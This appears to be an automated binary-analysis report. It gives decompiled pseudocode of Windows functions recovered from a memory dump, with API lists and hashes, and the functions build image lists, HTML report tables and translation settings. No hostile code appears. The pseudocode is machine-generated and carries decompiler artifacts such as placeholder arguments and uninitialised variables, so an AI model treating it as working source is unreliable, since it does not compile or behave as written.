                                                                                                                                                      				void* _v1256;
                                                                                                                                                      				void* _v1268;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				long _t38;
                                                                                                                                                      				long _t46;
                                                                                                                                                      				long _t48;
                                                                                                                                                      				long _t58;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                                      
                                                                                                                                                      				_t64 = ImageList_Create;
                                                                                                                                                      				_t62 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
                                                                                                                                                      					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
                                                                                                                                                      						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                      						 *(_t62 + 0x2b4) = _t48;
                                                                                                                                                      						__imp__ImageList_SetImageCount(_t48, 1);
                                                                                                                                                      						_push( *(_t62 + 0x2b4));
                                                                                                                                                      					} else {
                                                                                                                                                      						_v692.hIcon = 0;
                                                                                                                                                      						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                                                      						_v1216 = 0;
                                                                                                                                                      						memset( &_v1214, 0, 0x208);
                                                                                                                                                      						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                                                      						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                                                      						 *(_t62 + 0x2b4) = _t58;
                                                                                                                                                      						_push(_t58);
                                                                                                                                                      					}
                                                                                                                                                      					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
                                                                                                                                                      					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                      					 *(_t62 + 0x2b8) = _t46;
                                                                                                                                                      					__imp__ImageList_SetImageCount(_t46, 1);
                                                                                                                                                      					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                      				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                      				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                      				_v1244 = _t37;
                                                                                                                                                      				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
                                                                                                                                                      				_t38 = GetSysColor(0xf);
                                                                                                                                                      				_v1248 = _t38;
                                                                                                                                                      				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
                                                                                                                                                      				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
                                                                                                                                                      				DeleteObject(_v1268);
                                                                                                                                                      				DeleteObject(_v1268);
                                                                                                                                                      				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
                                                                                                                                                      			}



















                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00409A07
                                                                                                                                                      • memset.MSVCRT ref: 00409A1C
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
                                                                                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
                                                                                                                                                      • LoadImageW.USER32 ref: 00409AED
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
                                                                                                                                                      • LoadImageW.USER32 ref: 00409B0A
                                                                                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00409B23
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00409B5A
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00409B60
                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 304928396-0
                                                                                                                                                      • Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                      • Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
                                                                                                                                                      • Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                      • Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                      			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				void _v518;
                                                                                                                                                      				long _v520;
                                                                                                                                                      				void _v1030;
                                                                                                                                                      				char _v1032;
                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                      				wchar_t* _t57;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      
                                                                                                                                                      				_t58 = __esi;
                                                                                                                                                      				_v520 = 0;
                                                                                                                                                      				memset( &_v518, 0, 0x1fc);
                                                                                                                                                      				_v1032 = 0;
                                                                                                                                                      				memset( &_v1030, 0, 0x1fc);
                                                                                                                                                      				_t60 = _t59 + 0x18;
                                                                                                                                                      				_v8 = 1;
                                                                                                                                                      				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t57 = _a4;
                                                                                                                                                      				 *_t57 = 0;
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					wcscpy(_t57, L"<font");
                                                                                                                                                      					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                      					if(_t32 > 0) {
                                                                                                                                                      						_push(_t32);
                                                                                                                                                      						_push(L" size=\"%d\"");
                                                                                                                                                      						_push(0xff);
                                                                                                                                                      						_push( &_v520);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						wcscat(_t57,  &_v520);
                                                                                                                                                      						_t60 = _t60 + 0x18;
                                                                                                                                                      					}
                                                                                                                                                      					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                      					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                      						_push(E0040DBA9(_t33,  &_v1032));
                                                                                                                                                      						_push(L" color=\"#%s\"");
                                                                                                                                                      						_push(0xff);
                                                                                                                                                      						_push( &_v520);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						wcscat(_t57,  &_v520);
                                                                                                                                                      					}
                                                                                                                                                      					wcscat(_t57, ">");
                                                                                                                                                      				}
                                                                                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                      					wcscat(_t57, L"<b>");
                                                                                                                                                      				}
                                                                                                                                                      				wcscat(_t57, _a8);
                                                                                                                                                      				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                      					wcscat(_t57, L"</b>");
                                                                                                                                                      				}
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					wcscat(_t57, L"</font>");
                                                                                                                                                      				}
                                                                                                                                                      				return _t57;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                      • Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                      • Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
                                                                                                                                                      • Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                      • Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                      			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed short* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				void _v138;
                                                                                                                                                      				long _v140;
                                                                                                                                                      				void _v242;
                                                                                                                                                      				char _v244;
                                                                                                                                                      				void _v346;
                                                                                                                                                      				char _v348;
                                                                                                                                                      				void _v452;
                                                                                                                                                      				void _v962;
                                                                                                                                                      				signed short _v964;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				wchar_t* _t109;
                                                                                                                                                      				intOrPtr* _t124;
                                                                                                                                                      				signed int _t125;
                                                                                                                                                      				signed int _t140;
                                                                                                                                                      				signed int _t151;
                                                                                                                                                      				intOrPtr* _t152;
                                                                                                                                                      				signed int _t154;
                                                                                                                                                      				signed int _t155;
                                                                                                                                                      				void* _t157;
                                                                                                                                                      				void* _t159;
                                                                                                                                                      
                                                                                                                                                      				_t124 = __ebx;
                                                                                                                                                      				_v964 = _v964 & 0x00000000;
                                                                                                                                                      				memset( &_v962, 0, 0x1fc);
                                                                                                                                                      				_t125 = 0x18;
                                                                                                                                                      				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                                                      				asm("movsw");
                                                                                                                                                      				_t151 = 0;
                                                                                                                                                      				_v244 = 0;
                                                                                                                                                      				memset( &_v242, 0, 0x62);
                                                                                                                                                      				_v348 = 0;
                                                                                                                                                      				memset( &_v346, 0, 0x62);
                                                                                                                                                      				_v140 = 0;
                                                                                                                                                      				memset( &_v138, 0, 0x62);
                                                                                                                                                      				_t159 = _t157 + 0x3c;
                                                                                                                                                      				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                                                      				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
                                                                                                                                                      				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
                                                                                                                                                      				if(_t87 != 0xffffffff) {
                                                                                                                                                      					_t128 =  &_v964;
                                                                                                                                                      					_push(E0040DBA9(_t87,  &_v964));
                                                                                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                                                                                      					_push(0x32);
                                                                                                                                                      					_push( &_v244);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t159 = _t159 + 0x18;
                                                                                                                                                      				}
                                                                                                                                                      				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                                                      				_v8 = _t151;
                                                                                                                                                      				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
                                                                                                                                                      						_v12 = _t154;
                                                                                                                                                      						_t155 = _t154 * 0x14;
                                                                                                                                                      						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
                                                                                                                                                      							wcscpy( &_v140, L" nowrap");
                                                                                                                                                      						}
                                                                                                                                                      						_v32 = _v32 | 0xffffffff;
                                                                                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                                                                                      						_v20 = _t151;
                                                                                                                                                      						_t152 = _a8;
                                                                                                                                                      						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
                                                                                                                                                      						E0040DBA9(_v32,  &_v348);
                                                                                                                                                      						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
                                                                                                                                                      						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
                                                                                                                                                      						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                                                      							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
                                                                                                                                                      						} else {
                                                                                                                                                      							_push( *(_t155 + _v16 + 0x10));
                                                                                                                                                      							_push(E0040DBA9(_t106,  &_v964));
                                                                                                                                                      							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                                                      							_push(0x2000);
                                                                                                                                                      							_push( *(_t124 + 0x70));
                                                                                                                                                      							L0040DFD6();
                                                                                                                                                      							_t159 = _t159 + 0x14;
                                                                                                                                                      						}
                                                                                                                                                      						_t109 =  *(_t124 + 0x6c);
                                                                                                                                                      						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                                                      						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                                                      							wcscat(_t109, L"&nbsp;");
                                                                                                                                                      							_pop(_t128);
                                                                                                                                                      						}
                                                                                                                                                      						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
                                                                                                                                                      						_push( *((intOrPtr*)(_t124 + 0x74)));
                                                                                                                                                      						_push( &_v140);
                                                                                                                                                      						_push( &_v348);
                                                                                                                                                      						_push( *(_t124 + 0x70));
                                                                                                                                                      						_push( &_v244);
                                                                                                                                                      						_push( &_v452);
                                                                                                                                                      						_push(0x2000);
                                                                                                                                                      						_push( *((intOrPtr*)(_t124 + 0x68)));
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						_t159 = _t159 + 0x28;
                                                                                                                                                      						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
                                                                                                                                                      							goto L14;
                                                                                                                                                      						}
                                                                                                                                                      						_t151 = 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L14:
                                                                                                                                                      				E00408857(_t124, _t128, _a4, L"</table><p>");
                                                                                                                                                      				return E00408857(_t124, _t128, _a4, L"\r\n");
                                                                                                                                                      			}
































                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                      • Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                      • Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
                                                                                                                                                      • Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                      • Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                                      			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				char _v516;
                                                                                                                                                      				void _v1026;
                                                                                                                                                      				long _v1028;
                                                                                                                                                      				void _v1538;
                                                                                                                                                      				char _v1540;
                                                                                                                                                      				void _v2050;
                                                                                                                                                      				char _v2052;
                                                                                                                                                      				char _v2564;
                                                                                                                                                      				char _v35332;
                                                                                                                                                      				char _t51;
                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				void* _t79;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      
                                                                                                                                                      				_t75 = __ecx;
                                                                                                                                                      				E0040E340(0x8a00, __ecx);
                                                                                                                                                      				_v2052 = 0;
                                                                                                                                                      				memset( &_v2050, 0, 0x1fc);
                                                                                                                                                      				_v1540 = 0;
                                                                                                                                                      				memset( &_v1538, 0, 0x1fc);
                                                                                                                                                      				_v1028 = 0;
                                                                                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                      				_t79 = _t78 + 0x24;
                                                                                                                                                      				if(_a20 != 0xffffffff) {
                                                                                                                                                      					_push(E0040DBA9(_a20,  &_v2564));
                                                                                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                                                                                      					_push(0xff);
                                                                                                                                                      					_push( &_v2052);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t79 = _t79 + 0x18;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a24 != 0xffffffff) {
                                                                                                                                                      					_push(E0040DBA9(_a24,  &_v2564));
                                                                                                                                                      					_push(L"<font color=\"%s\">");
                                                                                                                                                      					_push(0xff);
                                                                                                                                                      					_push( &_v1540);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					wcscpy( &_v1028, L"</font>");
                                                                                                                                                      					_t79 = _t79 + 0x20;
                                                                                                                                                      				}
                                                                                                                                                      				_push( &_v2052);
                                                                                                                                                      				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                                                      				_push(0x3fff);
                                                                                                                                                      				_push( &_v35332);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				_t80 = _t79 + 0x10;
                                                                                                                                                      				E00408857(_a4, _t75, _a8,  &_v35332);
                                                                                                                                                      				_t51 = _a16;
                                                                                                                                                      				if(_t51 > 0) {
                                                                                                                                                      					_t73 = _a12 + 4;
                                                                                                                                                      					_a20 = _t51;
                                                                                                                                                      					do {
                                                                                                                                                      						_v516 = 0;
                                                                                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                                                                                      						_t54 =  *_t73;
                                                                                                                                                      						_t81 = _t80 + 0xc;
                                                                                                                                                      						if( *_t54 == 0) {
                                                                                                                                                      							_v516 = 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							_push(_t54);
                                                                                                                                                      							_push(L" width=\"%s\"");
                                                                                                                                                      							_push(0xff);
                                                                                                                                                      							_push( &_v516);
                                                                                                                                                      							L0040DFD6();
                                                                                                                                                      							_t81 = _t81 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1028);
                                                                                                                                                      						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                                                      						_push( &_v1540);
                                                                                                                                                      						_push( &_v516);
                                                                                                                                                      						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                                                      						_push(0x3fff);
                                                                                                                                                      						_push( &_v35332);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						_t80 = _t81 + 0x1c;
                                                                                                                                                      						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
                                                                                                                                                      						_t73 = _t73 + 8;
                                                                                                                                                      						_t36 =  &_a20;
                                                                                                                                                      						 *_t36 = _a20 - 1;
                                                                                                                                                      					} while ( *_t36 != 0);
                                                                                                                                                      					return _t61;
                                                                                                                                                      				}
                                                                                                                                                      				return _t51;
                                                                                                                                                      			}






















                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                      • Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                      • Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
                                                                                                                                                      • Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                      • Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
                                                                                                                                                      				void _v530;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				void _v1042;
                                                                                                                                                      				long _v1044;
                                                                                                                                                      				long _v4116;
                                                                                                                                                      				char _v5164;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x142c, __ecx);
                                                                                                                                                      				_v1044 = 0;
                                                                                                                                                      				memset( &_v1042, 0, 0x1fc);
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				memset( &_v530, 0, 0x208);
                                                                                                                                                      				E00405800( &_v532);
                                                                                                                                                      				_pop(_t44);
                                                                                                                                                      				E0040674D( &_v5164);
                                                                                                                                                      				_t27 = E0040DE36( &_v5164,  &_v532);
                                                                                                                                                      				_t61 = _t27;
                                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                                      					wcscpy( &_v1044,  &_v4116);
                                                                                                                                                      					_pop(_t44);
                                                                                                                                                      				}
                                                                                                                                                      				wcscpy(0x412c38, _a8);
                                                                                                                                                      				wcscpy(0x412e48, L"general");
                                                                                                                                                      				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
                                                                                                                                                      				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
                                                                                                                                                      				E00406DE5(_t61, L"Version",  &_v1044, 1);
                                                                                                                                                      				E00406DE5(_t61, L"RTL", "0", 0);
                                                                                                                                                      				_t13 =  &_a4; // 0x40743b
                                                                                                                                                      				EnumResourceNamesW( *_t13, 4, E00407047, 0);
                                                                                                                                                      				_t14 =  &_a4; // 0x40743b
                                                                                                                                                      				EnumResourceNamesW( *_t14, 5, E00407047, 0);
                                                                                                                                                      				wcscpy(0x412e48, L"strings");
                                                                                                                                                      				_t38 = E00407170(_t44, _t61, _a4);
                                                                                                                                                      				 *0x412c38 =  *0x412c38 & 0x00000000;
                                                                                                                                                      				return _t38;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004072BD
                                                                                                                                                      • memset.MSVCRT ref: 004072D9
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                        • Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                        • Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                        • Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                        • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                        • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                        • Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                        • Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040731D
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040732C
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040733C
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
                                                                                                                                                      • wcscpy.MSVCRT ref: 004073B3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                      • String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                      • API String ID: 3037099051-2223684028
                                                                                                                                                      • Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                      • Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
                                                                                                                                                      • Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                      • Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __esi;
